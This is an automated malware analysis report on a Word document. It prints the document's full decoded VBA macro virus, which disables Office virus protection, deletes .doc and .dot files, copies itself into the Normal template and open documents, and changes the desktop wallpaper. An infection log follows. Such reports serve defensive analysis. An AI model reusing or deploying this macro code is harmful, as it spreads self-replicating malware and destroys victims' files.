Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec4ab15a12d3b9b9…

MALICIOUS

Office (OLE)

764.5 KB Created: 2015-06-11 02:00:00 Authoring application: Microsoft Office Word First seen: 2015-09-23
MD5: 6dcc07c5da6d50f1508f4a15a0cb6188 SHA-1: 16d385276e88ebdf47873b78845ef79e3776b2c0 SHA-256: ec4ab15a12d3b9b9b971762eea3ac523be0909d67fe922e04a59ae8ce4b08cc8
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass T1190 Exploit Public-Facing Application T1071.001 Web Protocols

The sample is a Microsoft Office document containing VBA macros. The macros are designed to disable macro protection and replicate themselves, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The script also attempts to log information and potentially download further content, suggesting a downloader or dropper functionality. The presence of a specific email address in the script, 'JonMMx2000@yahoo.com', is noted as a potential IOC.

Heuristics 7

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x04 bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0009093D  0404              add al, 4
0009093F  0404              add al, 4
00090941  0404              add al, 4
00090943  0404              add al, 4
00090945  0404              add al, 4
00090947  0404              add al, 4
00090949  0404              add al, 4
0009094B  0404              add al, 4
0009094D  0404              add al, 4
0009094F  0404              add al, 4
00090951  0404              add al, 4
00090953  0404              add al, 4
00090955  0404              add al, 4
00090957  0404              add al, 4
00090959  0404              add al, 4
0009095B  0404              add al, 4
0009095D  0404              add al, 4
0009095F  0404              add al, 4
00090961  0404              add al, 4
00090963  0404              add al, 4
00090965  0404              add al, 4
00090967  0404              add al, 4
00090969  0404              add al, 4
0009096B  0404              add al, 4
0009096D  0404              add al, 4
0009096F  0404              add al, 4
00090971  0404              add al, 4
00090973  0404              add al, 4
00090975  0404              add al, 4
00090977  0404              add al, 4
00090979  0404              add al, 4
0009097B  0404              add al, 4
0009097D  0404              add al, 4
0009097F  0404              add al, 4
00090981  0404              add al, 4
00090983  0404              add al, 4
00090985  0404              add al, 4
00090987  0404              add al, 4
00090989  0404              add al, 4
0009098B  0404              add al, 4
0009098D  0404              add al, 4
0009098F  0404              add al, 4
00090991  0404              add al, 4
00090993  0404              add al, 4
00090995  0404              add al, 4
00090997  0404              add al, 4
00090999  0404              add al, 4
0009099B  0404              add al, 4
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00072130  40                inc eax
00072131  40                inc eax
00072132  40                inc eax
00072133  40                inc eax
00072134  40                inc eax
00072135  40                inc eax
00072136  40                inc eax
00072137  40                inc eax
00072138  40                inc eax
00072139  40                inc eax
0007213A  40                inc eax
0007213B  40                inc eax
0007213C  40                inc eax
0007213D  40                inc eax
0007213E  40                inc eax
0007213F  40                inc eax
00072140  40                inc eax
00072141  40                inc eax
00072142  40                inc eax
00072143  40                inc eax
00072144  40                inc eax
00072145  40                inc eax
00072146  40                inc eax
00072147  40                inc eax
00072148  40                inc eax
00072149  40                inc eax
0007214A  40                inc eax
0007214B  40                inc eax
0007214C  40                inc eax
0007214D  40                inc eax
0007214E  40                inc eax
0007214F  40                inc eax
00072150  40                inc eax
00072151  40                inc eax
00072152  40                inc eax
00072153  40                inc eax
00072154  40                inc eax
00072155  40                inc eax
00072156  40                inc eax
00072157  40                inc eax
00072158  40                inc eax
00072159  40                inc eax
0007215A  40                inc eax
0007215B  40                inc eax
0007215C  40                inc eax
0007215D  40                inc eax
0007215E  40                inc eax
0007215F  40                inc eax
00072160  40                inc eax
00072161  40                inc eax
00072162  40                inc eax
00072163  40                inc eax
00072164  40                inc eax
00072165  40                inc eax
00072166  40                inc eax
00072167  40                inc eax
00072168  40                inc eax
00072169  40                inc eax
0007216A  40                inc eax
0007216B  40                inc eax
0007216C  40                inc eax
0007216D  40                inc eax
0007216E  40                inc eax
0007216F  40                inc eax
00072170  40                inc eax
00072171  40                inc eax
00072172  40                inc eax
00072173  41                inc ecx
00072174  5f                pop edi
00072175  af                scasd eax, dword ptr es:[edi]
00072176  a861              test al, 0x61
00072178  a966763cf6        test eax, 0xf63c7666
0007217D  2426              and al, 0x26
0007217F  c6                .byte 0xc6
00072180  e6b6              out 0xb6, al
00072182  28a10bf90864      sub byte ptr [ecx + 0x6408f90b], ah
00072188  ef                out dx, eax
00072189  23bc31bc709884    and edi, dword ptr [ecx + esi - 0x7b678f44]
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13021 bytes
SHA-256: 27e2957f2d7320fe4d3bbe00a7829fd6f8c7e77a46c9412efe59386a46e09cc9
Detection
ClamAV: Doc.Trojan.Marker-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


'Seline, Where are you dear
Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim Jon, Users, LogData, LogFile As String
On Error Resume Next
AddIns.Unload True
Kill Options.DefaultFilePath(8) & "\*.doc"
Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
Application.UserInitials = "MeMeX"
Application.UserAddress = "JonMMx2000@yahoo.com"
Application.EnableCancelKey = wdCancelDisabled
GoSub InsertIon
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
   "LogData in") = False) Then GoSub LoggingIn
If Weekday(Now()) = 1 Then GoSub ShowMe
GoTo Finish
InsertIon:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
 If DI Then
   NTS = NormalTemplate.Saved
   Jon = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
   For i = 1 To Len(Application.UserAddress)
    If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
       If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
          Users = Users & Mid(Application.UserAddress, i, 1)
       End If
    Else
       Users = Users & Chr(13) & " '"
    End If
   Next
   Jon = Jon & Chr(13) & _
         "' " & Format(Time, "hh:mm:sc AMPM-") & _
                Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
         "' " & Application.UserName & Chr(13) & _
         "' " & Users & Chr(13) & Chr(13) & " "
   nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
   nt.CodeModule.AddFromString Jon
   If NTS Then NormalTemplate.Save
 End If
 If NTI Then
    DS = ActiveDocument.Saved
    Jon = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString Jon
    If DS Then ActiveDocument.Save
 End If
End If
Return
LoggingIn:
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
   GoSub ShowMe
Return
ShowMe:
Dim RootsyS As String
On Error Resume Next
 RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
 Open RootsyS & "\Jon.html" For Output As #1
 Print #1, "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
 Print #1, "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
 Print #1, "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
 Print #1, "<font normal></center>To the very best that happen in mylife<p>"
 Print #1, "<p>Long ago and in my mind, I can see your face lonely and lost in time "
 Print #1, "<p>You were gone since yester month But the memories, never would dissapear"
 Print #1, "<p>I think of you, I THINK OF YOU.<p>"
 Print #1, "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
 Print #1, "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
 Print #1, "<p>Dear Iin, I close my eyes and see your face.  That's all I have to do to be with you. "
 Print #1, "<p>Dear Iin, altough I can not touch your face.  I know what I can do to be with you "
 Print #1, "<p>Long ago so faraway. But the light of blue, still living with me today."
 Print #1, "<p>You were gone since yester month.  But the memories never would dissapear."
 Print #1, "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
 Close #1
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General", "Wallpaper") = RootsyS & "\Jon.html"
Return
Finish:
End Sub
'Logfile -->

' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com


' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:55:459:55:45 AM AM-Wednesday, 25 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:03:2112:03:21 PM PM-Friday, 27 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:47:402:47:40 PM PM-Sunday, 29 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:37:562:37:56 AM AM-Monday, 30 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:29:4310:29:43 PM PM-Wednesday, 1 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:28:249:28:24 AM AM-Sunday, 5 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:17:912:17:09 PM PM-Monday, 13 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:48:159:48:15 AM AM-Sunday, 26 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:34:5808:34:58 -Wednesday, 6 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:09:535:09:53 PM PM-Monday, 18 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:55:3110:55:31 AM AM-Wednesday, 20 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:57:5211:57:52 AM AM-Saturday, 6 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:51:302:51:03 PM PM-Monday, 29 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:24:1411:24:14 AM AM-Tuesday, 11 Jan 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:57:3103:57:31 PM PM-Thursday, 13 Jan 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:26:2203:26:22 下午 下午-Thursday, 17 Feb 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:55:178:55:17  AM-Tuesday, 21 Mar 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:15:509:15:50 AM-Thursday, 30 Mar 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:43:1910:43:19  AM-Monday, 22 May 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:36:388:36:38  AM-Wednesday, 31 May 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:33:210:33:02  AM-Saturday, 17 Jun 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:45:4612:45:46  PM-Wednesday, 26 Jul 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:12:4714:12:47 PM-Tuesday, 26 Sep 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:07:2715:07:27  PM-Tuesday, 14 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:04:3319:04:33  PM-Thursday, 16 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:29:1818:29:18  PM-Wednesday, 22 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:26:2310:26:23  AM-Saturday, 25 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:08:527:08:52  AM-Sunday, 26 Nov 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:15:508:15:50  AM-Friday, 22 Dec 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:50:158:50:15  AM-Wednesday, 7 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:36:59:36:05  AM-Thursday, 8 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:35:3403:35:34 下午 下午-Saturday, 24 Feb 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:43:1212:43:12 下午 下午-Saturday, 17 Mar 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:40:5910:40:59 上午 上午-Wednesday, 18 Apr 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:51:5702:51:57 下午 下午-Friday, 20 Apr 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:30:5801:30:58 下午 下午-Tuesday, 22 May 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:18:5812:18:58 下午 下午-Saturday, 16 Jun 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:16:722:16:07 下午-Sunday, 27 Feb 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:02:1515:02:15 下午-Wednesday, 9 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:54:2517:54:25 下午-Thursday, 17 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:37:1015:37:10 下午-Tuesday, 29 Mar 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:53:5917:53:59 下午-Thursday, 14 Apr 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:21:3214:21:32 下午-Friday, 13 May 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:49:529:49:52 上午-Tuesday, 28 Jun 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:48:158:48:15 上午-Friday, 15 Jul 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:20:148:20:14 上午-Thursday, 8 Sep 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:04:3811:04:38 上午-Sunday, 18 Sep 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:11:1317:11:13 下午-Thursday, 20 Oct 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:45:3817:45:38 下午-Saturday, 29 Oct 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:50:218:50:21 上午-Monday, 7 Nov 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:21:2318:21:23 下午-Friday, 18 Nov 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:06:409:06:40 上午-Saturday, 17 Dec 2011
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:29:239:29:23 上午-Saturday, 14 Jan 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:22:3215:22:32 下午-Sunday, 1 Apr 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:33:5913:33:59 下午-Tuesday, 5 Jun 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:14:3523:14:35 下午-Tuesday, 14 Aug 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:06:3310:06:33 上午-Monday, 27 Aug 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:19:1010:19:10 上午-Wednesday, 5 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:39:4513:39:45 下午-Friday, 7 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:06:214:06:02 下午-Friday, 7 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:13:3814:13:38 下午-Monday, 17 Sep 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:02:2214:02:22 下午-Monday, 8 Oct 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:32:113:32:01 下午-Wednesday, 10 Oct 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:46:409:46:40 上午-Thursday, 6 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:52:1118:52:11 下午-Thursday, 13 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:34:5510:34:55 上午-Thursday, 20 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:19:339:19:33 上午-Tuesday, 25 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:03:5512:03:55 下午-Thursday, 27 Dec 2012
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 03:19:5815:19:58 下午-Monday, 28 Jan 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:32:1611:32:16 上午-Tuesday, 29 Jan 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:30:2010:30:20 上午-Friday, 12 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:26:148:26:14 上午-Wednesday, 24 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:00:368:00:36 上午-Thursday, 25 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:58:3614:58:36 下午-Friday, 26 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:24:111:24:01 上午-Sunday, 28 Apr 2013
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 04:32:5916:32:59 下午-Sunday, 26 Jan 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:47:168:47:16 上午-Monday, 17 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 04:39:2516:39:25 下午-Monday, 17 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:06:814:06:08 下午-Thursday, 20 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:21:3118:21:31 下午-Thursday, 20 Feb 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:57:3812:57:38 下午-Tuesday, 15 Apr 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:55:1011:55:10 上午-Wednesday, 4 Jun 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:01:4610:01:46 上午-Friday, 25 Jul 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:42:4710:42:47 上午-Thursday, 13 Nov 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:07:5409:07:54 AM-Monday, 29 Dec 2014
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:57:3422:57:34 下午-Tuesday, 27 Jan 2015
' JonMMx 2000
' JonMMx2000@yahoo.com

Open this report in the interactive analyzer, or submit your own file for analysis.